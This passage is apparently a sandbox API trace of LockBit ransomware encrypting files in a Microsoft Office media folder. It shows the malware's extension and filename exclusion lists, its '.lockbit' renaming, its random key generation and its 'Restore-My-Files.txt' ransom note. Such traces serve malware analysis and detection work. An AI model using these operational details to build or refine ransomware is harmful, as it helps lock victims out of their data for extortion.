[0203.960] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.960] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.960] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.961] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.961] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15136_.GIF.lockbit") returned 78 [0203.961] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15136_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15136_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.963] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.963] malloc (_Size=0x40068) returned 0x3df0008 [0203.963] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=175) returned 1 [0203.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.964] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.967] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15136_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15136_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.967] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.967] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.967] free (_Block=0x1fa2ed8) [0203.967] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15136_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.967] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.967] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdfaba00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcaf5220, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcdfaba00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x14b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15168_.GIF", cAlternateFileName="")) returned 1 [0203.967] lstrcmpiW (lpString1=".", lpString2="BD15168_.GIF") returned -1 [0203.967] lstrcmpiW (lpString1="..", lpString2="BD15168_.GIF") returned -1 [0203.967] PathFindExtensionW (pszPath="BD15168_.GIF") returned=".GIF" [0203.967] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.967] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.967] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.967] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.967] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.967] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.967] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.967] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.967] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.967] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.967] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.968] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.968] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.968] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.968] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.968] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.968] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.968] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.968] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15168_.GIF") returned 1 [0203.969] lstrcmpiW (lpString1="ntldr", lpString2="BD15168_.GIF") returned 1 [0203.969] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15168_.GIF") returned 1 [0203.969] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15168_.GIF") returned 1 [0203.969] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15168_.GIF") returned -1 [0203.969] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15168_.GIF") returned 1 [0203.969] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15168_.GIF") returned 1 [0203.969] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.969] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15168_.GIF") returned=".GIF" [0203.969] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.969] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.969] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.970] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.970] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.970] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.970] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.970] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15168_.GIF.lockbit") returned 78 [0203.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15168_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15168_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.971] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.971] malloc (_Size=0x40068) returned 0x3df0008 [0203.971] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=331) returned 1 [0203.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.972] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.975] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15168_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15168_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.975] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.975] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.975] free (_Block=0x1fa2ed8) [0203.975] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15168_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.975] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.975] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.975] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdfaba00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcaf5220, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcdfaba00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15169_.GIF", cAlternateFileName="")) returned 1 [0203.975] lstrcmpiW (lpString1=".", lpString2="BD15169_.GIF") returned -1 [0203.975] lstrcmpiW (lpString1="..", lpString2="BD15169_.GIF") returned -1 [0203.975] PathFindExtensionW (pszPath="BD15169_.GIF") returned=".GIF" [0203.975] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.975] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.975] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.975] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.975] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.975] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.975] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.976] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.976] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15169_.GIF") returned 1 [0203.977] lstrcmpiW (lpString1="ntldr", lpString2="BD15169_.GIF") returned 1 [0203.977] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15169_.GIF") returned 1 [0203.977] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15169_.GIF") returned 1 [0203.977] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15169_.GIF") returned -1 [0203.977] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15169_.GIF") returned 1 [0203.977] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15169_.GIF") returned 1 [0203.977] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.977] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15169_.GIF") returned=".GIF" [0203.977] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.977] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.977] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.978] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.978] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.978] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.978] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.978] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.978] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.978] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.978] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15169_.GIF.lockbit") returned 78 [0203.978] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15169_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15169_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.979] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.980] malloc (_Size=0x40068) returned 0x3df0008 [0203.980] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=340) returned 1 [0203.980] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.980] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.980] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15169_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15169_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.983] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.984] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.984] free (_Block=0x1fa2ed8) [0203.984] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15169_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.984] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.984] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.984] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf2be700, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcaf5220, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcf2be700, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15170_.GIF", cAlternateFileName="")) returned 1 [0203.984] lstrcmpiW (lpString1=".", lpString2="BD15170_.GIF") returned -1 [0203.984] lstrcmpiW (lpString1="..", lpString2="BD15170_.GIF") returned -1 [0203.984] PathFindExtensionW (pszPath="BD15170_.GIF") returned=".GIF" [0203.984] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.984] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.984] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.984] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.984] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.984] 